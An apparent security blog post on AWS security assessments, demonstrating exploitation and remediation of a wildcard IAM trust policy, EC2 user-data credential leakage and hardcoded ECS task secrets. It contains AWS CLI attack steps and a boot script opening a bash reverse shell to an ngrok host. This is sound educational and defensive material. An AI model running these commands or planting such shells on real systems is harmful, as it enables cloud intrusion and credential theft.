TL/DR: In this world of rapid digitization, companies are moving from traditional on-premise deployments to cloud service providers for handling their infrastructure. In this article, we will discuss a series of common misconfigurations in AWS Services that lead to security vulnerabilities.
When it comes to cloud security, several types of maturity assessments can be performed before the resources/application/services are deployed into a company’s production environment. Therefore, it is essential to understand what types of assessments could be done when using Amazon Web Services (AWS)cloud environment. Three types of assessment types include:
Cloud Security Threat Modeling: Prevent all the major threats in terms of security before services/application goes into production. This could be done by performing a security design review and using a Product Requirements Document (PRD) diagram to map all the important data flows. It is also important to use a security questionnaire with the product team. This assessment helps companies understand the attack surface and vulnerabilities that could be present or that might occur before going live.
Cloud Penetration Tests (Internal and External): penetration tests aim to eliminate all the known application and network security-related vulnerabilities in the cloud environment. These tests also help the organization prevent sensitive data exposure as well.
Cloud Configuration Review: In this type of assessment, a company is trying to protect against configuration-related vulnerabilities that may lead to unauthorized access to secrets or protected resources, as well as privilege escalation and other methods of gaining access to the cloud environment.
AWS Security Assessments
It is important to understand the overall scope and resources which are being deployed into the cloud. Before getting started with a security assessment, it is essential to focus on the following points:
- Scoping of AWS Resources
- Developing an Attack Surface
- Determining the Mission Critical Services
- Reconnaissance of AWS Assets
- Understanding Security Control and Monitoring of Assets
Scoping of AWS Resources
The scoping of resources is the critical step before starting any cloud engagement. The main goal for this step is to outline the possible resources being deployed in AWS, such as the number of services, Elastic Compute Cloud (EC2) instances, internal and external IPs, APIs, and a number of Virtual Private Cloud (VPC) assets, subnets, Identity and Access Management (IAM) users and roles.
Try to gather as much documentation around the mapping and PRD diagrams of the company infrastructure. We can also use multiple tools and IAM roles to enumerate the possible services present in AWS. There are a lot of different tools that can determine the list of resources or services used within AWS. There are also a host of tools that allow you to enumerate, discover, and map out AWS resources; below are a few of my favorites:
Developing an Attack Surface
After the initial scoping phase, preparing an attack strategy for the engagement is important. Before starting an assessment, this step is necessary to ensure that most test cases are covered against specific services and resources in AWS.
The end goal for this step is to ensure quality control, full coverage of test cases, and to account for more complex test cases. For example, a complex test case can involve discovering how an attacker can leverage a misconfiguration in a service and escalate their attack into much more critical issues such as crypto mining, administrative access of infrastructure, backdooring services (Lambda), or gaining unauthorized access to the services.
Determining Mission Critical Services in AWS
During an AWS assessment, it is vital to understand the use cases of different services and identify any associated concerns. Before starting the audit, the main goal should be to map the critical services such as EC2, Lambda, IAM, RDS, and S3. It is important to prioritize assessing and analyzing these core services for any known misconfiguration issues or known common vulnerabilities.
For example, here are some questions to ask yourself to map out what is a mission-critical service within AWS:
- Does the service contain some form of sensitive data?
- Does this service handle the authentication and authorization process?
- Are there any APIs associated with this service?
- Which service providers have delegated access to resources?
- Which services are storing secrets, and how do we handle them?
- What kind of services would be at risk of exposure if they were to contain known application security vulnerabilities?
Reconnaissance on AWS Assets
In this next step, you need to perform reconnaissance and list or enumerate all the public endpoints to find resources that might be exposed globally. This step also helps companies to understand what sort of public exposure they have and identify assets in terms of IP, domains, S3 buckets, CloudFront services, Elastic Load Balancing (ELB), public snapshots (eg. Elastic Block Storage (EBS) or other databases), and Amazon account IDs that can be used for cross-account role enumeration.
Understanding the Security Controls & Monitoring
This step covers how companies monitor, react and handle security incidents. It establishes a baseline for assessing if all the necessary controls are present or not if an intrusion were to take place. Throughout this step, it’s important to check for the presence of the following security controls:
- CloudWatch – Used for monitoring and optimization of resources
- CloudTrail – Used for tracking all malicious API calls
- Configuration best practices – Checking over compliance & configuration changes for a resource
- S3 Logging – Storing S3 Logs
We want to ensure that the different solutions are properly managed and that they perform their respective security tasks accurately. This is important because these services are your front line of defense if anything gets compromised within an AWS environment.
Identification of AWS Services
Now that we’ve covered an AWS security assessment at a high level, this section of the blog will dive into more detail about some of the common AWS core services, as well as provide insight into what kind of vulnerabilities can arise across these different services. The AWS core services we’ll cover are as follows:
- Identity and Access Management (IAM)
- API Gateway
- Lambda
- Elastic Compute Cloud (EC2)
Identity and Access Management (IAM)
The IAM service is used for managing and delegating access to resources using an access control mechanism in the format of JSON policy. If an attacker can gain access to AWS access keys used in the IAM service, then they can leverage multiple misconfigurations and escalate their privileges, change the password for the IAM account, or gain access to sensitive information in S3 or Lambda environment variables through existing IAM policies. Some of the more well-known vulnerabilities and misconfigurations within IAM are:
- Misconfigured trust policies
- Cross-account role enumeration
- Overly permissive policies
- Dangerous policy combination
- Pass role
API Gateway
The API gateway is a fully managed AWS service that can be used across different AWS Services such as Lambda, Kinesis, and EC2. The API gateway service is used to develop, maintain, publish, and manage restful APIs and webSockets. Some of the common issues in an API Gateway are:
- Lack of authentication on endpoints
- Misconfigured private API endpoints
- Denial of Service (DoS)
- Poor authorizer function
Lambda
The Lambda service allows you to run code without managing your server and handles compute, autoscaling, and capacity provisioning for you automatically. In Lambda, you can run or execute a function to complete the tasks. To do so, you need to call the Lambda API or use AWS services/resources to invoke your function. The common vulnerabilities in Lambda are:
- Common application security vulnerabilities such as Server-Side Request Forgery (SSRF), XML External Entity (XXE) attacks, deserialization, and command injection
- Insecure 3rd party dependencies
- Using Lambda as a backdoor
- Denial of Service (DoS) vectors, such as AWS VPC IP Deception or Financial Resource Exhaustion techniques
- Lambda alias routing
Elastic Compute Cloud (EC2)
The EC2 service is used to deploy virtual instances of servers or computers which can run applications on the AWS cloud environment. Using an EC2 instance, it is possible to launch multiple servers or instances in AWS for deploying your resources. The common issues related to EC2 are:
- User data scripts that expose sensitive information such as SSH keys, AWS keys, secrets, or tokens
- Public Elastic Block Storage (EBS) snapshots
- Unencrypted EBS volumes and snapshots
- SSRF leading to metadata leakage
- Exploiting open ports and exposed services
Common AWS Misconfigurations
Of the three most common AWS misconfiguration issues seen in AWS environments, we’ll dive into individual misconfiguration, an attack method as well as remediation efforts that can be made to prevent these styles of attacks. We’ll cover the following vulnerabilities in this section:
- IAM misconfigured trust policy
- EC2 user data leakage leads to sensitive information disclosure
- Dumping hardcoded secrets from Elastic Container Service (ECS) task definition
IAM Misconfigured Trust Policy
To understand this vulnerability, we first need to understand the trust policy and its components. The trust policy is a JSON document that ensures that only allowed or “trusted” principals are able to assume the IAM role. For a user to assume the IAM role, they need to have `sts:AssumeRole` permissions attached to their IAM user account. From here, the user is able to perform all the necessary actions that are defined in the IAM JSON policy for that role.
Misconfigurations arise when the AWS `Principal` parameter is set to a wildcard (“*” or “?”) which allows all the IAM entity users to assume the role and perform actions that would be defined in the IAM role policy. This overly permissive misconfiguration allows any user in the company to assume the IAM role, and from here, any user is able to escalate privileges to gain administrative access.
Vulnerable IAM Trust Policy
For example, below is an IAM trust policy with a wildcard set:
{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "AWS": "*" }, "Action": "sts:AssumeRole", "Condition": {} } ] }
Exploitation of IAM Misconfigured Trust
To demonstrate an attacker could abuse this wildcard to and elevate privileges, let’s step through an attack scenario:
- Using AWS CLI, check the user account using the command, `aws sts get-caller-identity –profile test_user`:

Identifying the user account in AWS CLI
2. Check the IAM trust policy for all the roles using the command, `aws iam list-roles –profile test_user`:

Identifying all roles within the IAM trust policy
- From this, we can see that the role name `s3-production-access` which has AWS Principal as `“*”`, as seen in the figure below:

AWS Principle role set as a wildcard
- In the IAM role policy, it’s possible to verify what privileges this role has by using the command, `aws iam list-attached-role-policies –role-name s3-production-access –profile test_user`:

Verifying privilege level
- From here, we can see that after assuming this role, we can get full access to the production S3 buckets. So, to assume this role, we need to use the Security Token Service (STS) by using the following command:
`aws sts assume-role –role-arn “arn:aws:iam::290338565208:role/s3-production-access” –role-session attack –profile test_user`
- Once we have configured the access key, secret access key, and the session token, we can verify that we have access to the role by using the following command:
`aws sts get-caller-identity –profile iam_attack`
This is verified in the figure below:

Verification of access to S3 bucket
- Now we can list and access the `production-secret-data` bucket and get the file’s contents by running the following command, `aws s3 ls –profile iam_attack`, as shown in Figure 6. From here, we can access the username and password of the account, as shown below:

Running the command to access the `production-secret-data` bucket

Access to username and password
Remediation
To remediate this IAM trust policy misconfiguration, the use of a wildcard (“*”) in the `Principal` parameter must be restricted. Always ensure that a valid IAM entity can be allowed to assume the role of Principle in the organization.
The right policy format would look something like this:
{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": {“AWS": "arn:aws:iam::123456789012:authorized" }, "Action": "sts:AssumeRole", "Condition": { "Bool": { "aws:MultiFactorAuthPresent": "true" } } } ] }
This example is correctly configured because it has valid `Principal` and `Condition` parameters, which ensures no other IAM user can assume this role. This configuration also ensures that the user has Multi-Factor Authentication (MFA) enabled for this role to be used.
EC2 User Data Leakage Leads to Sensitive Information Disclosure
During the booting process, it is possible to deploy or execute bash scripts during the runtime process of the EC2 instances. This script runs only during the boot process, but it does run with root user privileges. Sometimes we notice that the developers can automate certain tasks such as installation of software, updating the instances, and setting environment variables during the booting process.
This data from the booting process can be viewed by the attacker when assessing an AWS environment and include AWS access keys, username, password, and environment variables. An attacker can use these AWS credentials to create multiple instances and add backdoors or shells to the instances within the AWS infrastructure.
Exploitation of User Data in EC2:
- First, we need to identify all of the instances in the AWS Account in a specified region using the command, `aws ec2 describe-instances –profile test_account –region us-east-1`:

Identifying the AWS account `InstanceId` in a specified region
- Using the `InstanceId` from Figure 8, we can retrieve `userdata` information from the EC2 Instance with the command, `aws ec2 describe-instances –instance-id i-0cf93849d3d84f670 –attribute userdata –profile test_account –region us-east-1`:

‘userdata’ information retrieved showing string encoded with base64
- From here, we can decode the base64 string, getting the username and password for the instance user, as it was hardcoded in the `userdata` script during the booting process:

Decoding the Base64 data
- Now that we have the username and password for this user, we can get a reverse shell from this vulnerability by attempting to modify the instance’s attributes. For this to occur, we need to tamper with the instance attributes.
To do so, we can run the following command: `aws ec2 modify-instance-attribute –instance-id [target instance] –attribute userData –value file://exploit.sh`
Exploit.sh #cloud-boothook #!/bin/bash bash -i >& /dev/tcp/6.tcp.ngrok.io/11404 0>&1 python -c 'import pty; pty.spawn("/bin/bash")'
In order for this to trigger, the victim user has to restart the instances, which will execute the script and give us the simple reverse shell on our terminal, as seen below:

Gaining a reverse shell
Remediation
A number of best practices can be followed to remediate this kind of attack:
- Avoid using `ec2:ModifyInstanceAttribute` privileges and restrict the development team from hardcoding sensitive values such as environment variables, AWS access keys, and credentials
- Apply the principle of least privilege to all roles assigned to users and instances.
- Implement proper egress control to minimize using reverse shells and downloading malicious payloads. This involves disabling all outbound communications by default for security groups.
Dumping Hardcoded Secrets from ECS Tasks Definition
Elastic Container Service (ECS) is a service that allows users to host containerized applications and is part of AWS Managed Services. The ECS has 2 different launch types: Fargate, and EC2. Before creating and deploying applications on ECS, we need to launch clusters. Clusters are defined as logical ways of grouping tasks or services, whereas the containers are your actual application that would be executed within your ECS Clusters.
To have containers, we need to define a task definition within a JSON document containing the summary or blueprint of your application. The task is defined as an instantiation of a task definition in a cluster. This vulnerability arises when creating a task definition when the development team adds sensitive information such as credentials and tokens in the command line as arguments.
ECS Exploitation
- Configure Pacu and add the necessary AWS credentials in the session:

Configuring Pacu and adding credentials
- To enumerate tasks within the ECS cluster, run the command, `exec ecs__enum`:

Enumerating tasks within the ECS cluster
- After this step, we can now try to dump all the tasks definition using the Pacu module:

Task definitions dumped into folder
- The task definition has now been dumped into the given folder. Now, we would need to view the contents of task definitions and check for sensitive information in environment variables such as, MYSQL credentials:

Checking the task definitions for sensitive information

Identified MySQL credentials hardcoded into task definitions
Remediation
To reduce the risk of exposing data to third parties, it is recommended that secrets are not stored unencrypted. All secrets should be encrypted when at rest and in transit.
Conclusion
In the blog, we have covered some of the vulnerabilities that can be found during an AWS security assessment. We have also identified some solutions that help protect against these types of attacks when deploying applications on the cloud. It is important that organizations understand the threats that they will face and the preventative measures that should be taken while deploying any application. If these preventative processes are implemented during the design phase, it’s possible to reduce the risks to the AWS environment.
For further reading, please see the AWS attack mindmap and further resources below:
AWS Attack Mind Map
Further Resources
- https://aws.amazon.com/security/
- https://rhinosecuritylabs.com/blog/
- https://application.security/free/kontra-aws-clould-top-10
- https://github.com/RhinoSecurityLabs/cloudgoat
- https://github.com/OWASP/DVSA
- Payloads_All_Things_AWS
- AWS Attacks Mind Map
Written by: Devansh Bordia
Cyber Security Consultant who enjoys breaking applications and is acknowledged by Bugcrowd MVP 2020 in Q2. He found over 200+ vulnerabilities in various multinational organizations. He reported a slew of CVEs in Open-Source Products and holds technical certifications such as eCPPT, eWPTX, and AWS Solution Architect.